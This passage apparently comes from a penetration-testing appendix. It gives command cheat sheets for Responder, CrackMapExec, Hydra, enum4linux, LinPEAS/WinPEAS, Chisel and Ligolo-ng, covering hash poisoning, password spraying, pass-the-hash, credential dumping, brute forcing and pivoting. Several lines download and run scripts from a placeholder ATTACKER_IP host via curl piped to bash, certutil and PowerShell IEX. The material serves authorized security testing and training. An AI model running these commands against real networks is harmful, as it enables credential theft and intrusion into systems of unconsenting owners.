Purpose: LLMNR, NBT-NS, and mDNS poisoner for capturing NTLMv2 hashes on a local network.

Basic Usage

# Start Responder on interface
sudo responder -I eth0

# Analyze mode (listen only, no poisoning)
sudo responder -I eth0 -A

# Enable extra answer types (these flags enable, not disable; check responder -h,
# the meaning of -d changed in newer releases)
sudo responder -I eth0 -r -d -w
# -r: answer NetBIOS wredir suffix queries (can break things on the network)
# -d: answer NetBIOS domain suffix queries (newer releases: DHCP answers instead)
# -w: start the WPAD rogue proxy server

# Force WPAD authentication
sudo responder -I eth0 -wFb

# Enable verbose mode
sudo responder -I eth0 -v

Hash Location

# Captured hashes stored in:
/usr/share/responder/logs/

# Hash format (NTLMv2):
username::domain:challenge:response:blob

# Crack with hashcat
hashcat -m 5600 hashes.txt wordlist.txt

Tips

  • Run Responder during the first few minutes of an internal pentest for quick wins
  • Combine with ntlmrelayx.py for relay attacks instead of just capturing hashes
  • Use -A (analyze) first to understand the network before poisoning
  • Captured hashes are NTLMv2 (mode 5600 in hashcat)
  • Check the Responder.conf file to enable/disable specific servers (HTTP, SMB, etc.)

13. CrackMapExec / NetExec

Purpose: Swiss army knife for pentesting Windows/Active Directory networks. Automates enumeration, credential testing, and command execution across multiple hosts.

Basic Enumeration

# SMB enumeration
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.0/24 -u '' -p ''  # Null session
crackmapexec smb 192.168.1.0/24 -u 'guest' -p ''  # Guest

# Authenticate and enumerate
crackmapexec smb 192.168.1.0/24 -u user -p password
crackmapexec smb 192.168.1.0/24 -u user -p password --shares
crackmapexec smb 192.168.1.0/24 -u user -p password --users
crackmapexec smb 192.168.1.0/24 -u user -p password --groups
crackmapexec smb 192.168.1.0/24 -u user -p password --sessions
crackmapexec smb 192.168.1.0/24 -u user -p password --loggedon-users

Credential Testing

# Password spraying
crackmapexec smb targets.txt -u users.txt -p 'Password1'

# Pass-the-hash
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH

# Test credentials across protocols
crackmapexec smb targets.txt -u user -p pass
crackmapexec winrm targets.txt -u user -p pass
crackmapexec mssql targets.txt -u user -p pass
crackmapexec rdp targets.txt -u user -p pass

Command Execution

# Execute commands
crackmapexec smb target -u admin -p pass -x "whoami"
crackmapexec smb target -u admin -p pass -X "Get-Process"  # PowerShell

# Dump SAM hashes
crackmapexec smb target -u admin -p pass --sam

# Dump LSA secrets
crackmapexec smb target -u admin -p pass --lsa

# Dump NTDS (Domain Controller)
crackmapexec smb DC_IP -u admin -p pass --ntds

Tips

  • Pwn3d! in the output means you have local admin access on the target
  • Use --continue-on-success with password spraying to find all valid accounts
  • Use --local-auth to test local accounts instead of domain accounts
  • CrackMapExec has been rebranded as NetExec (nxc) in newer versions
  • The --gen-relay-list option generates a list of hosts without SMB signing for NTLM relay

14. Hydra

Purpose: Fast parallelized network login cracker supporting over 50 protocols.

Common Usage

# SSH brute force
hydra -l admin -P wordlist.txt ssh://192.168.1.10

# FTP brute force
hydra -l admin -P wordlist.txt ftp://192.168.1.10

# HTTP POST form
hydra -l admin -P wordlist.txt \
  192.168.1.10 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid credentials"

# HTTP Basic Auth
hydra -l admin -P wordlist.txt \
  192.168.1.10 http-get /admin

# RDP
hydra -l admin -P wordlist.txt rdp://192.168.1.10

# SMB
hydra -l admin -P wordlist.txt smb://192.168.1.10

# MySQL
hydra -l root -P wordlist.txt mysql://192.168.1.10

# Multiple users and passwords
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

# Specific port
hydra -l admin -P wordlist.txt -s 2222 ssh://192.168.1.10

# Limit threads and wait time
hydra -l admin -P wordlist.txt -t 4 -W 1 ssh://192.168.1.10

HTTP Form Syntax

http-post-form "/path:BODY:FAILURE_STRING"
  ^USER^ = username placeholder
  ^PASS^ = password placeholder
  Third field = string that appears on FAILED login

# Example with cookie
hydra -l admin -P wordlist.txt 192.168.1.10 \
  http-post-form "/login.php:user=^USER^&pass=^PASS^:Login failed:H=Cookie: session=abc"

Tips

  • Use -t to control threads (default 16); too many threads can cause false negatives
  • The failure string must be unique to failed login attempts
  • Use -V for verbose mode to see each attempt
  • Use -f to stop after the first successful login
  • For HTTP forms, use Burp Suite to capture the exact POST parameters first

15. enum4linux / enum4linux-ng

Purpose: Tool for enumerating information from Windows and Samba systems via SMB.

Basic Usage

# Full enumeration
enum4linux -a 192.168.1.10

# Specific enumerations
enum4linux -U 192.168.1.10   # Users
enum4linux -S 192.168.1.10   # Shares
enum4linux -G 192.168.1.10   # Groups
enum4linux -P 192.168.1.10   # Password policy
enum4linux -o 192.168.1.10   # OS information

# With credentials
enum4linux -u user -p password -a 192.168.1.10

# enum4linux-ng (Python rewrite, recommended)
enum4linux-ng -A 192.168.1.10
enum4linux-ng -u user -p pass -A 192.168.1.10
enum4linux-ng -A 192.168.1.10 -oJ output.json

Tips

  • enum4linux-ng provides better output formatting and JSON export
  • Null sessions may not work on modern Windows; use authenticated scans when possible
  • The -a flag runs all enumeration tests
  • Combine with CrackMapExec for more thorough SMB enumeration

16. LinPEAS / WinPEAS

Purpose: Automated privilege escalation enumeration scripts for Linux and Windows.

LinPEAS

# Transfer to target
# On attacker: python3 -m http.server 8080
# On target:
curl http://ATTACKER_IP:8080/linpeas.sh | bash
# or
wget http://ATTACKER_IP:8080/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

# Save output
./linpeas.sh | tee linpeas_output.txt

# Run specific checks only
./linpeas.sh -s    # Superfast (fewer checks)
./linpeas.sh -P    # Password checks
./linpeas.sh -o    # Only linpeas checks (no external tools)

WinPEAS

# Transfer and execute
certutil.exe -urlcache -split -f http://ATTACKER_IP/winPEASx64.exe C:\temp\winpeas.exe
C:\temp\winpeas.exe

# Run from memory (PowerShell)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/winPEAS.ps1')

# Specific checks
winpeas.exe servicesinfo
winpeas.exe userinfo
winpeas.exe systeminfo

Color-Coded Output

Color       Meaning
RED/YELLOW  95% chance of privilege escalation vector
RED         Important but needs manual verification
CYAN        Active users
BLUE        Disabled users
GREEN       Interesting information
LIGHT GREY  Less important information

Tips

  • Save output to a file for later analysis (piping through tee)
  • Red/Yellow highlights are your priority findings
  • On restricted systems where you cannot upload files, use the shell script version (LinPEAS) or inline PowerShell (WinPEAS)
  • Always cross-reference findings manually; automated tools miss context-dependent vectors
  • Use alongside manual enumeration (GTFOBins for Linux, LOLBAS for Windows)

17. Chisel

Purpose: Fast TCP/UDP tunnel over HTTP, secured via SSH. Used for port forwarding and pivoting through firewalls.

Setup

# On attacker (server mode)
./chisel server --reverse --port 8080

# On target (client mode) — reverse port forward
./chisel client ATTACKER_IP:8080 R:ATTACKER_PORT:TARGET_IP:TARGET_PORT

# Example: Forward target's internal port 3389 to attacker's port 3389
./chisel client 10.10.14.5:8080 R:3389:127.0.0.1:3389

# SOCKS proxy
# Server:
./chisel server --reverse --port 8080
# Client:
./chisel client 10.10.14.5:8080 R:socks

# Then use proxychains with socks5://127.0.0.1:1080

Common Scenarios

# Forward local port to remote service through pivot
# Attacker:
./chisel server --reverse -p 9001
# Pivot host:
./chisel client ATTACKER:9001 R:8888:INTERNAL_HOST:80

# Access internal service at attacker's localhost:8888

# Multiple tunnels
./chisel client ATTACKER:9001 \
  R:3306:DB_SERVER:3306 \
  R:445:DC:445 \
  R:socks

Tips

  • Chisel is a single binary, making it easy to transfer to compromised hosts
  • Use R:socks for a dynamic SOCKS proxy through the compromised host
  • Configure /etc/proxychains4.conf to use socks5 127.0.0.1 1080
  • Chisel uses HTTP, making it firewall-friendly
  • Compile for the target OS: GOOS=windows go build or use pre-built releases

18. Ligolo-ng

Purpose: Advanced tunneling/pivoting tool that creates a user-mode network interface, making pivoted networks feel like local networks.

Setup

# On attacker (proxy)
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601

# On target (agent)
./agent -connect ATTACKER_IP:11601 -ignore-cert

Usage

# In the proxy interface:
# List sessions
session

# Select a session
session      # then enter the number

# Start tunnel
start

# Add route to internal network
sudo ip route add 10.10.10.0/24 dev ligolo

# Now scan/access 10.10.10.0/24 directly from your machine!
nmap -sV 10.10.10.50

Listeners (Reverse Connections Through Pivot)

# In proxy interface:
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

# This forwards connections from pivot:4444 to attacker:4444
# Useful for receiving reverse shells from deeper network segments

Tips

  • Ligolo-ng is superior to SOCKS-based pivoting because all tools work natively (no proxychains needed)
  • The tun interface makes the pivoted network appear local to your machine
  • Transfer the agent binary to each compromised host in the chain for multi-hop pivoting
  • Use listener_add to catch reverse shells through multiple network layers
  • Agent binaries are available for Windows, Linux, and macOS

All tools referenced in this appendix should only be used on systems you own or have explicit written authorization to test. Unauthorized use of these tools against systems you do not own is illegal and unethical.